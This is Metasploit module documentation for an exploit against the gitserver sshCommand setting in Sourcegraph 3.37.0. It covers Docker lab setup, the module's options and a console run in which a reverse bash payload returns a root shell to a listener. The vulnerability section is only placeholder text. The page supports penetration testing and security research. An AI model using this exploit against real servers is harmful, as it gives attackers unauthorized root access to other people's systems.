metasploit-gs/documentation/modules/exploit/linux/http/sourcegraph_gitserver_sshcmd.md
2022-07-08 16:40:42 -04:00


Vulnerable Application

lorem ip sum blah blah

Verification Steps

  1. Install the application
    1. Install and run it through Docker:

       docker run \
         --publish 3178:3178 \
         --publish 7080:7080 \
         --publish 127.0.0.1:3370:3370 \
         --rm \
         --volume ~/.sourcegraph/config:/etc/sourcegraph \
         --volume ~/.sourcegraph/data:/var/opt/sourcegraph \
         sourcegraph/server:3.37.0

    2. Configure a cloned repo, using a GitHub access token

  2. Start msfconsole

  3. Do: use exploit/linux/http/sourcegraph_gitserver_sshcmd

  4. Set the options

  5. Do: run

  6. You should get a shell.

Options


EXISTING_REPO

An existing cloned repo on the server. If none is specified, one will be automatically determined.

Scenarios

SourceGraph v3.37.0 running on Docker

msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > show options

Module options (exploit/linux/http/sourcegraph_gitserver_sshcmd):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   EXISTING_REPO                   no        An existing, cloned repository
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          3178             yes       The target port (TCP)
   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        8080             yes       The local port to listen on.
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI      /                yes       Base path
   URIPATH                         no        The URI to use for this exploit (default is random)
   VHOST                           no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
[*] Executing Unix Command target

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)